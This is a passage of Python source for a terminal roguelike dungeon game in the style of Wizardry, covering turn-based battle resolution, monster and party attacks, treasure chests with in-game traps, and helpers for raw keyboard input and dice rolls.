self.choose_item(mem)\n if not item:\n continue\n self.entities.append(\n Entity(mem, mem.name, None, agi, item, target))\n mem.action = item\n self.game.vscr.disp_scrwin()\n break\n if c == 't':\n break\n if c != 't':\n self.mw.print(\"Press any key or t)ake back >\")\n self.game.vscr.disp_scrwin()\n c = getch(wait=True)\n if c == 't':\n self.entities = []\n for mem in self.game.party.members:\n mem.action = '????????????'\n continue\n break\n\n def choose_group(self):\n \"\"\"\n choose monster group and return group #\n \"\"\"\n if len(self.monp) == 1:\n return 0\n while True:\n self.mw.print(f\"Which group? (#)\")\n self.game.vscr.disp_scrwin()\n n = getch(wait=True)\n try:\n n = int(n)\n except:\n continue\n if n > len(self.monp):\n continue\n return n-1\n\n def choose_spell(self, mem):\n \"\"\"\n Choose spell to cast and the target monster group or the party member\n \"\"\"\n mw = self.mw\n s = mw.input(\"What spell to cast?\")\n s = s.lower()\n if s not in self.game.spelldef: # No such spell\n return s, None\n elif s not in list(itertools.chain(mem.mspells, mem.pspells)):\n return s, None # not mastered yet\n sdef = self.game.spelldef[s]\n if sdef.target == 'enemy' or sdef.target == 'group':\n target = self.monp[self.choose_group()]\n elif sdef.target == 'member':\n while True:\n ch = mw.input_char(f\"To who? (#)\")\n try:\n if 0 <= (chid := int(ch)-1) < len(self.game.party.members):\n break\n except:\n pass\n target = self.game.party.members[chid]\n else:\n target = None\n return s, target\n\n def choose_item(self, mem):\n \"\"\"\n Choose item to use. If the item has spell power and the\n spell needs target to choose, have player specify target.\n \"\"\"\n mw = self.mw\n mw.print(\"Which item to use?\")\n for i, item in enumerate(mem.items, 1):\n if item[3]:\n dispitem = ''.join(['?', self.game.itemdef[item[0]].unident])\n else:\n dispitem = item[0]\n mw.print(f\"{i}) {dispitem}\")\n idx = mw.input_char(\"Item # or l)eave\",\n values=['1', '2', '3', '4', '5', '6', '7', '8', 'l'])\n if idx == 'l':\n return False, None\n idef = mem.items[int(idx)-1]\n if idef[3]:\n iname = ''.join(['?', self.game.itemdef[idef[0]].unident])\n else:\n iname = idef[0]\n spell = self.game.itemdef[idef[0]].use\n if spell != '' and spell in self.game.spelldef and \\\n iname == idef[0]:\n target = self.game.spelldef[spell].target\n if target == 'member':\n m = self.game.party.choose_character(self.game)\n if not m:\n return False, None\n return iname, m\n elif target in ['group', 'enemy']:\n mong = self.monp[self.choose_group()]\n return iname, mong\n return iname, None\n\n def monster_attack(self, e):\n \"\"\"\n Monster attacks a member\n \"\"\"\n mdef = self.game.mondef[e.name]\n if e.group.identified:\n dispname = e.name\n else:\n dispname = mdef.unident\n if mdef.type in ['animal', 'undead', 'dragon', 'insect']:\n verb = random.choice(['tears', 'rips', 'gnaws', 'bites', 'claws'])\n else:\n verb = random.choice(\n ['swings', 'thrusts', 'stabs', 'slashes', 'chops'])\n if e.target.state in [State.DEAD, State.ASHED, State.LOST]:\n self.mw.print(f\"{e.name} lost its target.\")\n return\n\n apoint = 19\n if e.target.action == 'parry':\n apoint += 2\n apoint -= self.game.mondef[e.name].level + 2\n bpoint = apoint - e.target.ac - e.target.acplus - self.game.party.ac\n\n if bpoint >= 19:\n val = 19\n elif 0 <= bpoint < 19:\n val = bpoint\n elif -36 <= bpoint < 0:\n val = 0\n else:\n if apoint < 0:\n val = 0\n else:\n val = 19\n hitp = (19 - val)*100//20 # hit percent\n\n hitcnt = 0\n damage = 0\n for _ in 
range(self.game.mondef[e.name].count):\n if hitp > random.randrange(100):\n hitcnt += 1\n damage += dice(self.game.mondef[e.name].attack)\n e.target.hp -= damage\n if e.target.state != State.OK:\n e.target.hp -= damage # twice the damage if not status OK\n self.mw.print(f\"{dispname} {verb} at {e.target.name}.\")\n self.mw.print(f\"{e.target.name} incurred {damage} damage.\", start=' ')\n self.game.vscr.disp_scrwin()\n if e.target.hp <= 0:\n e.target.hp = 0\n e.target.state = State.DEAD\n self.mw.print(f\"{e.target.name} is killed.\", start=' ')\n return\n if hitcnt == 0:\n return\n\n regist = set()\n for item in e.target.items:\n if item[1]: # equipped\n regist |= set(self.game.itemdef[item[0]].regist)\n\n if self.game.mondef[e.name].poison:\n if (e.target.stat[5]+1)*100//20 < random.randrange(100):\n if 'poison' not in regist:\n e.target.poisoned = True\n e.target.hpplus -= 1\n self.mw.print(f\"{e.target.name} is poisoned.\")\n\n if self.game.mondef[e.name].paraly:\n if (e.target.stat[5]+1)*100//20 < random.randrange(100):\n if 'paraly' not in regist:\n e.target.state = State.PARALYZED\n self.mw.print(f\"{e.target.name} is paralyzed.\")\n\n if self.game.mondef[e.name].stone:\n if (e.target.stat[5]+1)*100//20 < random.randrange(100):\n if 'stone' not in regist:\n e.target.state = State.STONED\n self.mw.print(f\"{e.target.name} is petrified.\")\n\n if not e.target.drained and self.game.mondef[e.name].drain > 0:\n if (e.target.stat[5]+1)*100//20 < random.randrange(100):\n if 'drain' not in regist:\n prevlevel = e.target.level\n e.target.level -= self.game.mondef[e.name].drain\n if e.target.level-1 < 13:\n e.target.exp = level_table[e.target.job][e.target.level-2]\n else:\n e.target.exp = level_table[e.target.job][11] +\\\n level_table[e.target.job][12]*(e.target.level-13)\n if e.target.level < 13:\n e.target.nextexp = level_table[e.target.job][e.target.level-1]\n else:\n e.target.nextexp = level_table[e.target.job][11] +\\\n level_table[e.target.job][12]*(e.target.level-12)\n self.mw.print(\n f\"{e.target.name} is drained by {self.game.mondef[e.name].drain} level.\")\n if e.target.level < 1:\n e.target.hp = 0\n e.target.state = State.LOST\n self.mw.print(f\"{e.target.name} is lost.\")\n return\n e.target.maxhp = \\\n e.target.maxhp * \\\n (prevlevel - self.game.mondef[e.name].drain) \\\n // prevlevel\n if e.target.hp > e.target.maxhp:\n e.target.hp = e.target.maxhp\n e.target.drained = True\n\n if self.game.mondef[e.name].critical:\n if (e.target.stat[5]+1)*100//20 < random.randrange(100):\n if 'critical' not in regist:\n if (49 - self.game.mondef[e.name].level) * 100 / 50 \\\n < random.randrange(100):\n e.target.state = State.DEAD\n e.target.hp = 0\n self.mw.print(f\"{e.target.name} is decapitated.\")\n\n def dispell(self, e):\n \"\"\"\n Party member dispells a monster group\n \"\"\"\n mondef = self.game.mondef[e.target.name]\n if e.target.identified:\n dispname = e.target.name\n else:\n dispname = mondef.unident\n self.mw.print(f\"{e.name} tried to dispell.\")\n if mondef.type != 'undead':\n self.mw.print(\"Not undead.\", start=' ')\n return\n dspl_power = e.entity.level * 5 + 50\n dspl_regist = 10 * mondef.level\n if dspl_power > 255:\n chance = 100\n else:\n chance = max(5, dspl_power - dspl_regist)\n target_cp = e.target.monsters[:]\n for mon in target_cp:\n if random.randrange(100) < chance:\n mon.state = State.DEAD\n mon.hp = 0\n self.mw.print(f\"{dispname} is dispelled.\", start=' ')\n e.target.monsters.remove(mon)\n if not e.target.monsters:\n 
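# the group is empty; drop it from the battle lineup\n                    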
self.game.battle.monp.remove(e.target)\n            else:\n                self.mw.print(f"{dispname} resisted the dispell.", start=' ')\n\n    def member_attack(self, e):\n        """\n        Party member attacks a monster\n        """\n        if e.entity.job in [Job.MAGE, Job.THIEF, Job.BISHOP]:\n            lvbonus = e.entity.level // 5\n        else:\n            lvbonus = e.entity.level // 3 + 2\n        strbonus = 0\n        if e.entity.stat[0] >= 16:\n            strbonus = e.entity.stat[0] - 15\n        elif e.entity.stat[0] < 6:\n            strbonus = e.entity.stat[0] - 6\n        st_bonus = weapat = 0\n        weapon = None\n        for item in e.entity.items:\n            if item[1]:  # equipped?\n                # (check align)\n                itemdef = self.game.itemdef[item[0]]\n                if not itemdef.align or e.entity.align in itemdef.align:\n                    st_bonus += itemdef.st\n                else:\n                    st_bonus = -1\n                if itemdef.type.lower() == 'weapon':\n                    weapon = itemdef  # for later use\n                    weapat = weapon.at\n        hitability = lvbonus + strbonus + st_bonus\n        for idx, g in enumerate(self.monp):\n            if g is e.target:  # row of the target group; farther rows are harder to hit\n                break\n        hitpercent = (self.game.mondef[e.target.name].ac\n                      - idx + hitability) * 100 // 20\n\n        if e.entity.job == Job.NINJA:\n            atkcnt = max(e.entity.level//5+2, weapat)\n        elif e.entity.job in [Job.FIGHTER, Job.SAMURAI, Job.LORD]:\n            atkcnt = max(e.entity.level//5+1, weapat)\n        else:\n            atkcnt = max(e.entity.level//10+1, weapat)\n        if atkcnt > 10 and not e.entity.have_item('kaiden book', equip=True):\n            atkcnt = 10\n\n        damage = hitcnt = 0\n        for _ in range(atkcnt):\n            if hitpercent > random.randrange(100):\n                if weapon is None:\n                    damage += dice('2D2')  # w/o weapon\n                else:\n                    # twice the damage depending on monster type\n                    if self.game.mondef[e.target.name].type in weapon.twice:\n                        damage += dice(weapon.dice) * 2\n                    else:\n                        damage += dice(weapon.dice)\n                hitcnt += 1\n        if e.target.identified:\n            dispname = e.target.name\n        else:\n            dispname = self.game.mondef[e.target.name].unident\n        if e.target.monsters[0].state != State.OK:\n            damage *= 2\n        verb = random.choice(['swings', 'thrusts', 'stabs', 'slashes'])\n        self.mw.print(\n            f"{e.name} {verb} violently at {dispname} and hits {hitcnt} times for {damage} damage.")\n        e.target.monsters[0].hp -= damage\n\n        if e.entity.job == Job.NINJA:\n            crit = (e.entity.level -\n                    self.game.mondef[e.target.name].level) + 20\n            if crit > 80:\n                crit = 80\n            elif crit < 5:\n                crit = 5\n            if crit > random.randrange(100):\n                e.target.monsters[0].hp = 0\n                e.target.monsters[0].state = State.DEAD\n                self.mw.print(f"{dispname} is decapitated!")\n\n        if e.target.monsters[0].hp <= 0:\n            e.target.monsters[0].state = State.DEAD\n            self.mw.print(f"{dispname} is killed.", start=' ')\n            self.exp += self.game.mondef[e.target.name].exp\n            e.entity.marks += 1\n            e.target.monsters.pop(0)\n            if not e.target.monsters:\n                self.monp.remove(e.target)\n                self.draw_ew()\n\n    def reorder_party(self):\n        """\n        Members with bad status move back.\n        """\n        mems = self.game.party.members\n        for mem in mems[:]:  # iterate over a copy while reordering\n            if mem.state not in [State.OK]:\n                mems.remove(mem)\n                mems.append(mem)\n\n    def identify_check(self):\n        """\n        Identify each monster group with 50% probability\n        """\n        for mong in self.monp:\n            if random.randrange(100) % 2:\n                mong.identified = True\n\n    def battle(self):\n        """\n        battle main\n        """\n        self.new_battle()\n        place = self.game.party.place\n        self.game.party.place = Place.BATTLE\n        v = self.game.vscr\n        v.meswins.append(self.ew)\n        v.meswins.append(self.mw)\n        self.mw.cls()\n\n        self.create_monsterparty()\n        self.draw_ew()\n\n        if self.handle_friendly(place):\n            party = self.game.party\n            self.treasure = False\n            for idx, room in enumerate(party.floor_obj.rooms):\n                if room.in_room(party.x, party.y):\n                    
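# remember the room as fought so its guardian won't respawn\n                    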
party.floor_obj.battled[idx] = True\n                    break\n            v.meswins.pop()\n            v.meswins.pop()\n            self.game.party.place = place\n            return\n\n        if self.surprised == 1:\n            self.mw.print("You surprised the monsters.\n - press space bar")\n            self.game.vscr.disp_scrwin()\n            while getch(wait=True) != ' ':\n                pass\n        elif self.surprised == 2:\n            self.mw.print("Monsters surprised you.\n - press space bar")\n            self.game.vscr.disp_scrwin()\n            while getch(wait=True) != ' ':\n                pass\n\n        while True:\n            for m in self.game.party.members:\n                m.action = '????????????'\n            self.recover_state()\n            self.reorder_party()\n            self.identify_check()\n            self.draw_ew()\n            v.disp_scrwin()\n            if self.input_action():\n                self.ran = True\n                v.meswins[0].print("Ran away from the battle.")\n                v.disp_scrwin()\n                self.game.party.x, self.game.party.px =\\\n                    self.game.party.px, self.game.party.x\n                self.game.party.y, self.game.party.py =\\\n                    self.game.party.py, self.game.party.y\n                self.game.party.floor, self.game.party.pfloor =\\\n                    self.game.party.pfloor, self.game.party.floor\n                self.game.party.floor_obj =\\\n                    self.game.dungeon.floors[self.game.party.floor-1]\n                self.treasure = False\n                break  # ran successfully\n            self.enemy_action()\n            self.surprised = 0\n\n            self.entities.sort(key=attrgetter('agi'), reverse=True)\n            entities_tmp = self.entities[:]\n            for e in entities_tmp:\n                if not e.valid:\n                    continue\n                dispname = e.name\n                if isinstance(e.target, Monstergrp):\n                    if not self.monp:\n                        break\n                    if not e.target.monsters:  # the group is already gone\n                        e.target = self.monp[0]\n                if isinstance(e.entity, Monster):\n                    if not e.group.identified:\n                        dispname = self.game.mondef[e.name].unident\n                if e.entity.state is State.ASLEEP:\n                    self.mw.print(f"{dispname} is asleep.")\n                    continue\n                if e.entity.state not in [State.OK]:\n                    continue\n                if not self.monp:\n                    break\n\n                if e.action == 'parry':\n                    self.mw.print(f"{dispname} parried.")\n                elif e.action == 'breath':\n                    self.mw.print(f"{dispname} breathed on the party.")\n                    for mem in self.game.party.members:\n                        damage = e.entity.hp // 2\n                        mem.hp = max(0, mem.hp - damage)\n                        self.mw.print(f"{mem.name} incurred {damage} damage.",\n                                      start=' ')\n                        if mem.hp <= 0 and mem.state not in \\\n                           [State.DEAD, State.ASHED, State.LOST]:\n                            mem.state = State.DEAD\n                            self.mw.print(f"{mem.name} is killed.",\n                                          start=' ')\n                elif e.action == 'fight':\n                    if isinstance(e.entity, Member):\n                        self.member_attack(e)\n                    else:\n                        self.monster_attack(e)\n                elif e.action == 'dispell':\n                    self.dispell(e)\n                elif e.action == 'run':  # monster only\n                    if self.canrun(e.entity):\n                        e.group.monsters.remove(e.entity)\n                        self.mw.print(f"{dispname} ran away.")\n                        if not e.group.monsters:\n                            self.monp.remove(e.group)\n                            self.draw_ew()\n                    else:\n                        self.mw.print(f"{dispname} tried to run away.")\n                        self.mw.print(f".. but wasn't able to.", start=' ')\n                elif '?' in e.action:  # tried to use unidentified item\n                    self.mw.print(f"{dispname} tried to use {e.action}.")\n                    self.mw.print(\n                        f".. but doesn't know how to use it.", start=' ')\n                elif e.action in self.game.itemdef:  # item\n                    item = self.game.itemdef[e.action]\n                    if item.use and self.game.spelldef[item.use].battle:\n                        spell = item.use  # the spell this item invokes\n                        self.mw.print(f"{dispname} used {e.action}.")\n                        self.mw.print(f".. and invoked {spell}.")\n                        v.disp_scrwin()\n                        getch(wait=True)\n                        self.game.spell.cast_spell_dispatch(\n                            e.entity, spell, e.target)\n                    else:\n                        self.mw.print(f"{dispname} tried to use {e.action}.")\n                        self.mw.print(f".. 
but wasn't able to.\", start=' ')\n elif e.action in self.game.spelldef: # spell\n spelldef = self.game.spelldef[e.action]\n if isinstance(e.entity, Member):\n if (not spelldef.battle) or \\\n e.action not in list(itertools.chain(\n e.entity.mspells, e.entity.pspells)):\n self.mw.print(\n f\"{dispname} tried to cast {e.action}\")\n self.mw.print(\n f\".. but nothing happend.\", start=' ')\n v.disp_scrwin()\n getch(wait=True)\n continue\n else:\n if e.action in e.entity.mspells:\n if e.entity.mspell_cnt[spelldef.level-1] > 0:\n e.entity.mspell_cnt[spelldef.level-1] -= 1\n else:\n self.mw.print(\n f\"{dispname} tried to cast {e.action}\")\n self.mw.print(f\".. but MP is exhausted.\")\n v.disp_scrwin()\n getch(wait=True)\n continue\n else:\n if e.entity.pspell_cnt[spelldef.level-1] > 0:\n e.entity.pspell_cnt[spelldef.level-1] -= 1\n else:\n self.mw.print(\n f\"{dispname} tried to cast {e.action}\")\n self.mw.print(f\".. but MP is exhausted.\")\n v.disp_scrwin()\n getch(wait=True)\n continue\n if e.entity.silenced:\n self.mw.print(\n f\"{dispname} tried to cast {e.action} but silenced.\")\n else:\n self.mw.print(f\"{dispname} casted {e.action}.\")\n self.game.spell.cast_spell_dispatch(\n e.entity, e.action, e.target)\n self.clean_dead() # clean up dead monsters\n v.disp_scrwin()\n if not self.monp:\n break\n getch(wait=True)\n\n # Battle end?\n party = self.game.party\n if not self.monp:\n for idx, room in enumerate(party.floor_obj.rooms):\n if room.in_room(party.x, party.y):\n party.floor_obj.battled[idx] = True\n break\n v.disp_scrwin()\n getch(wait=True)\n break\n defeated = True\n for mem in party.members:\n if mem.state in [State.OK, State.ASLEEP]:\n defeated = False\n break\n if defeated:\n self.mw.print(\"The party lost the battle and defeated.\")\n self.mw.input_char(\" - press space bar\", values=[' '])\n party.place = Place.EDGE_OF_TOWN\n members = party.members[:]\n for mem in members:\n mem.hp = 0\n if mem.state in [State.PARALYZED, State.STONED]:\n mem.state = State.DEAD\n mem.in_maze = True\n mem.floor = party.floor # last known place for him/her\n party.members.remove(mem)\n party.floor = 0\n party.floor_move = 2\n party.light_cnt = 0\n party.ac = 0\n party.silenced = False\n party.identify = False\n party.gps = False\n break\n\n v.disp_scrwin()\n # getch()\n\n v.meswins.pop()\n v.meswins.pop()\n self.game.party.place = place\n return\n\n def clean_dead(self):\n \"\"\"\n clean up dead monsters from monp and entities so that\n dead monsters don't attack or continue to be target\n \"\"\"\n monp_tmp = self.monp[:]\n for mong in monp_tmp:\n mong_tmp = mong.monsters[:]\n for mon in mong_tmp:\n if mon.state in [State.DEAD, State.ASHED, State.LOST]:\n mon.hp = 0\n mong.monsters.remove(mon)\n e = [e for e in self.entities if e.entity is mon]\n if e:\n e[0].valid = False\n if not mong.monsters: # no alive monsters in grp\n self.monp.remove(mong)\n\n def recover_state(self):\n \"\"\"\n Every turn, asleep members/monsers might wake up.\n Also, hpplus to members/momsters\n \"\"\"\n v = self.game.vscr\n mw = v.meswins[-1]\n for mem in self.game.party.members:\n mem.hp = min(max(0, mem.hp+mem.hpplus), mem.maxhp)\n if mem.state == State.ASLEEP and random.randrange(100) < 50:\n mem.state = State.OK\n for mong in self.monp:\n for mon in mong.monsters:\n mon.hp = min(max(0, mon.hp+mon.hpplus), mon.maxhp)\n if mon.state == State.ASLEEP:\n if self.game.mondef[mon.name].weaksleep:\n chance = 15\n else:\n chance = 40\n if random.randrange(100) < chance:\n mon.state = State.OK\n\n def 
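\n\n    # Hedged odds note for check_battle() below: entering an un-battled room\n    # triggers a guardian fight with probability min(95, floor*10)%, and each\n    # step otherwise has a 1-in-64 chance of a random encounter.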
\n    def check_battle(self):\n        """\n        Check if they'll have a battle.\n        Return 0 for no battle, 1 for a random encounter, 2 for a room battle.\n        """\n        party = self.game.party\n        rooms = party.floor_obj.rooms\n        for idx, room in enumerate(rooms):\n            if idx == 0:\n                continue\n            if room.in_room(party.x, party.y) \\\n               and not party.floor_obj.battled[idx]:\n                if random.randrange(100) < min(95, party.floor*10):\n                    self.room_index = idx\n                    return 2  # with room guardian\n                else:\n                    party.floor_obj.battled[idx] = True\n        if random.randrange(64) == 0:\n            self.room_index = -1  # random encounter\n            return 1  # random encounter\n\n        return 0\n\n\nclass Entity:\n    """\n    Represents a battle entity, either a monster or a party member\n    """\n\n    def __init__(self, entity, name, group, agi, action, target):\n        self.entity = entity  # member or monster object\n        self.name = name  # member name or monster name (identified)\n        self.group = group\n        self.agi = agi  # relative agility\n        self.action = action  # command name, spell name, or item name\n        self.target = target  # member obj, mongrp obj ('self', 'all'?)\n        self.valid = True  # valid flag\n\n\nclass Chest:\n    """\n    Represents a chest\n    """\n\n    def __init__(self, game):\n        self.game = game\n        self.mw = Meswin(game.vscr, 14, 3, 44, 10, frame=True)\n        self.trap = Trap.TRAPLESS_CHEST\n        self.items = None\n\n    def chest(self):\n        """\n        Chest main. Determine the trap, inspect, disarm, activate\n        the trap, find items, etc.\n        """\n        game = self.game\n        v = game.vscr\n        mw = self.mw\n        v.meswins.append(mw)\n        mw.cls()\n\n        self.trap = self.choose_trap()\n        for mem in game.party.members:\n            mem.inspected = False\n        mw.print("A chest!")\n        while True:\n            mw.print("o)pen k)antei i)nspect d)isarm")\n            mw.print("l)eave alone", start=' ')\n            c = mw.input_char("Option?", values=['o', 'k', 'i', 'd', 'l'])\n            if c == 'l':  # leave alone\n                getch(wait=True)\n                v.meswins.pop()\n                return\n            elif c == 'o':\n                mem = game.party.choose_character(game)\n                if not mem:\n                    continue\n                self.trap_activated(mem)\n                self.treasure()\n                v.meswins.pop()\n                return\n            elif c == 'd':  # disarm\n                mem = game.party.choose_character(game)\n                if not mem:\n                    continue\n                ans = mw.input("Trap name?")\n                if ans == self.trap.name.lower().replace('_', ' '):\n                    if mem.job in [Job.THIEF, Job.NINJA]:\n                        chance = mem.level - game.party.floor + 50\n                    else:\n                        chance = mem.level - game.party.floor\n                else:\n                    self.trap_activated(mem)\n                    self.treasure()\n                    v.meswins.pop()\n                    return\n                if random.randrange(70) < chance:\n                    mw.print("Disarmed the trap.", start=' ')\n                    self.treasure()\n                    v.meswins.pop()\n                    return\n                if random.randrange(20) < mem.stat[4]:  # agility\n                    mw.print("Failed to disarm.", start=' ')\n                    v.disp_scrwin()\n                    continue\n                self.trap_activated(mem)\n                self.treasure()\n                v.meswins.pop()\n                return\n            elif c == 'k':  # kantei (identify the trap)\n                mem = game.party.choose_character(game)\n                if not mem:\n                    continue\n                if 'kantei' in mem.pspells and mem.pspell_cnt[1]:\n                    mem.pspell_cnt[1] -= 1\n                    mw.print(f"{mem.name} cast kantei.")\n                    if random.randrange(100) < 95:\n                        ans = self.trap\n                    else:\n                        ans = self.choose_trap()\n                    mw.print(f"It is {ans.name.lower().replace('_', ' ')}.",\n                             start=' ')\n                else:\n                    mw.print(f"{mem.name} failed to cast kantei.", start=' ')\n                v.disp_scrwin()\n                getch(wait=True)\n            elif c == 'i':  # inspect\n                mem = game.party.choose_character(game)\n                if not mem:\n                    continue\n                if mem.inspected:\n                    mw.print("Already inspected.", start=' ')\n                    continue\n                if mem.job == Job.THIEF:\n                    chance = mem.stat[4] * 6  # agility\n                elif mem.job == Job.NINJA:\n                    chance = mem.stat[4] * 4\n                else:\n                    chance = mem.stat[4]\n                chance = min(chance, 
95)\n                if random.randrange(100) >= chance:  # failed?\n                    if random.randrange(20) > mem.stat[4]:\n                        self.trap_activated(mem)\n                        self.treasure()\n                        v.meswins.pop()\n                        return\n                    else:\n                        ans = self.choose_trap()\n                else:  # succeeded to identify\n                    ans = self.trap\n                mem.inspected = True  # matches the "Already inspected" guard above\n                mw.print(f"It is {ans.name.lower().replace('_', ' ')}.",\n                         start=' ')\n                v.disp_scrwin()\n\n    def treasure(self):\n        """\n        Find and get up to 4 items from the chest.\n        """\n        mw = self.game.vscr.meswins[-1]\n        got = False\n        if len(self.items) > 0:\n            if random.randrange(100) < 80:  # 80%\n                item = self.choose_item(self.items[0])\n                self.get_item(item)\n                got = True\n            self.items.pop(0)\n        if len(self.items) > 0:\n            if random.randrange(100) < 40:  # 40%\n                item = self.choose_item(self.items[0])\n                self.get_item(item)\n                got = True\n            self.items.pop(0)\n        if len(self.items) > 0:\n            if random.randrange(100) < 8:  # 8%\n                item = self.choose_item(self.items[0])\n                self.get_item(item)\n                got = True\n            self.items.pop(0)\n        if len(self.items) > 0:\n            if random.randrange(100) < 1:  # 1%\n                item = self.choose_item(self.items[0])\n                self.get_item(item)\n                got = True\n        if not got:\n            mw.print("There was no interesting item.")\n            self.game.vscr.disp_scrwin()\n            getch(wait=True)\n\n    def choose_item(self, item_lvl):\n        """\n        Randomly pick one item of the specified item level.\n        """\n        items = []\n        for item in self.game.itemdef:\n            if self.game.itemdef[item].level == item_lvl:\n                items.append(item)\n        item = random.choice(items)\n        return item\n\n    def get_item(self, item):\n        """\n        Someone in the party gets the item found.\n        """\n        v = self.game.vscr\n        mw = v.meswins[-1]\n        mem = random.choice(\n            [mem for mem in self.game.party.members if len(mem.items) < 8])\n        mem.items.append([item, False, False, True])\n        mw.print(\n            f"{mem.name} found {self.game.itemdef[item].unident}", start=' ')\n        v.disp_scrwin()\n        getch(wait=True)\n\n    def trap_activated(self, mem):\n        """\n        Trap is activated and does harm to party member(s).\n        """\n        game = self.game\n        v = game.vscr\n        mw = self.mw\n        if self.trap == Trap.TRAPLESS_CHEST:\n            mw.print(f"It was a trapless chest.")\n            v.disp_scrwin()\n            getch(wait=True)\n            return\n        mw.print(f"Oops, {self.trap.name.lower().replace('_', ' ')}!")\n        if self.trap == Trap.POISON_NEEDLE:\n            # if not mem.poisoned:\n            #     mem.hpplus -= 1\n            mem.poisoned = True\n            mw.print(f"{mem.name} was poisoned.", start=' ')\n        elif self.trap == Trap.GAS_BOMB:\n            for m in game.party.members:\n                if random.randrange(100) < 50:\n                    # if not m.poisoned:\n                    #     mem.hpplus -= 1\n                    m.poisoned = True\n                    mw.print(f"{m.name} was poisoned.", start=' ')\n            v.disp_scrwin()\n        elif self.trap == Trap.CROSSBOW_BOLT:\n            damage = dice('1D8')*game.party.floor\n            mem.hp = max(mem.hp-damage, 0)\n            mw.print(f"{mem.name} incurred {damage} damage.", start=' ')\n            if mem.hp <= 0:\n                mem.state = State.DEAD\n                mw.print(f"{mem.name} is killed.", start=' ')\n            v.disp_scrwin()\n        elif self.trap == Trap.EXPLODING_BOX:\n            for m in game.party.members:\n                if random.randrange(100) < 75 and \\\n                   m.state not in [State.DEAD, State.ASHED, State.LOST]:\n                    if random.randrange(100) < 67:\n                        damage = dice('1D5') * game.party.floor\n                    else:\n                        damage = dice('1D8') * game.party.floor\n                    m.hp = max(m.hp-damage, 0)\n                    mw.print(f"{m.name} incurred {damage} damage.", start=' ')\n                    if m.hp <= 0:\n                        m.state = State.DEAD\n                        mw.print(f"{m.name} is killed.", start=' ')\n            v.disp_scrwin()\n        elif self.trap == Trap.STUNNER:\n            mem.state = State.PARALYZED\n            mw.print(f"{mem.name} got stunned.", start=' ')\n            v.disp_scrwin()
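\n        # remaining traps: TELEPORTER relocates the party at random, ALARM\n        # sets the party's alarm flag, and the two BLASTER traps paralyze or\n        # petrify the corresponding spellcaster jobs.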
\n        elif self.trap == Trap.TELEPORTER:\n            mw.print(f"Oops, teleporter!", start=' ')\n            v.disp_scrwin()\n            game.party.move(random.randrange(game.party.floor_obj.x_size),\n                            random.randrange(game.party.floor_obj.y_size))  # floor_obj, not the floor number\n        elif self.trap == Trap.ALARM:\n            game.party.alarm = True\n        elif self.trap == Trap.MAGE_BLASTER:\n            for m in game.party.members:\n                if m.job == Job.MAGE:\n                    if random.randrange(20) >= m.stat[5]:\n                        if m.state in [State.OK]:\n                            m.state = State.PARALYZED\n                            mw.print(f"{m.name} is paralyzed.", start=' ')\n                    else:\n                        if m.state in [State.OK, State.PARALYZED]:\n                            m.state = State.STONED\n                            mw.print(f"{m.name} is petrified.", start=' ')\n                elif m.job == Job.SAMURAI:\n                    if random.randrange(20) >= m.stat[5]:\n                        if m.state in [State.OK]:\n                            m.state = State.PARALYZED\n                            mw.print(f"{m.name} is paralyzed.", start=' ')\n            v.disp_scrwin()\n        elif self.trap == Trap.PRIEST_BLASTER:\n            for m in game.party.members:\n                if m.job == Job.PRIEST:\n                    if random.randrange(20) >= m.stat[5]:\n                        if m.state in [State.OK]:\n                            m.state = State.PARALYZED\n                            mw.print(f"{m.name} is paralyzed.", start=' ')\n                    else:\n                        if m.state in [State.OK, State.PARALYZED]:\n                            m.state = State.STONED\n                            mw.print(f"{m.name} is petrified.", start=' ')\n                elif m.job == Job.LORD:\n                    if random.randrange(20) >= m.stat[5]:\n                        if m.state in [State.OK]:\n                            m.state = State.PARALYZED\n                            mw.print(f"{m.name} is paralyzed.", start=' ')\n            v.disp_scrwin()\n        getch(wait=True)\n\n    def choose_trap(self):\n        """\n        Decide which trap the chest has.\n        """\n        game = self.game\n        if game.party.floor <= 2:\n            trap = random.choice([Trap.TRAPLESS_CHEST, Trap.POISON_NEEDLE,\n                                  Trap.CROSSBOW_BOLT])\n        elif game.party.floor <= 5:\n            trap = random.choice(\n                [Trap.TRAPLESS_CHEST, Trap.POISON_NEEDLE, Trap.CROSSBOW_BOLT,\n                 Trap.GAS_BOMB, Trap.EXPLODING_BOX, Trap.STUNNER])\n        elif game.party.floor <= 8:\n            trap = random.choice(\n                [Trap.TRAPLESS_CHEST, Trap.GAS_BOMB, Trap.EXPLODING_BOX,\n                 Trap.STUNNER, Trap.MAGE_BLASTER, Trap.PRIEST_BLASTER])\n        else:\n            trap = random.choice(\n                [Trap.TRAPLESS_CHEST, Trap.GAS_BOMB, Trap.EXPLODING_BOX,\n                 Trap.STUNNER, Trap.MAGE_BLASTER, Trap.PRIEST_BLASTER,\n                 Trap.TELEPORTER, Trap.ALARM])\n        return trap\n\n\ndef terminal_size():\n    """\n    Get terminal size\n    Will return width and height\n    """\n    h, w, hp, wp = struct.unpack('HHHH',\n                                 fcntl.ioctl(0, termios.TIOCGWINSZ,\n                                             struct.pack('HHHH', 0, 0, 0, 0)))\n    return w, h\n\n\ndef getch(wait=False):\n    """\n    realtime key scan\n    wait - if it waits (blocks) for user input\n    """\n    if os_windows:\n        if msvcrt.kbhit() or wait:  # msvcrt.kbhit() is non-blocking\n            c = msvcrt.getch()  # msvcrt.getch() is blocking\n            if c == b'Q':  # msvcrt.getch() returns bytes on Python 3\n                sys.exit()\n            return c\n        return ''  # no key pending and not waiting\n\n    fd = sys.stdin.fileno()\n    oattr = termios.tcgetattr(fd)\n    ch = ''\n    try:\n        while ch == '':\n            tty.setraw(sys.stdin.fileno())\n            ch = sys.stdin.read(1)\n            if not wait:\n                break\n    finally:\n        termios.tcsetattr(fd, termios.TCSADRAIN, oattr)\n    if ch == 'Q':\n        sys.exit()\n    return ch\n\n\ndef dice(valstr):\n    """\n    valstr as "2D6", "1D8+2", "10D10+300", etc.\n    """\n    pattern = r"(\d+)[dD](\d+)(\+(\d+))?"\n    m = re.search(pattern, valstr)\n    total = 0\n    if m[4] is None:\n        plus = 0\n    else:\n        plus = int(m[4])\n    for _ in range(int(m[1])):\n        total += random.randint(1, int(m[2]))\n    return total + plus\n\n\ndef create_character(game):\n    """\n    Create a character (a training grounds menu item)\n    """\n    vscr = game.vscr\n    mw = vscr.meswins[-1]\n    while True:\n        if (name := mw.input("Enter new name")):\n            if name in [char.name for char in game.characters]:\n                mw.print("The name is already used.", 
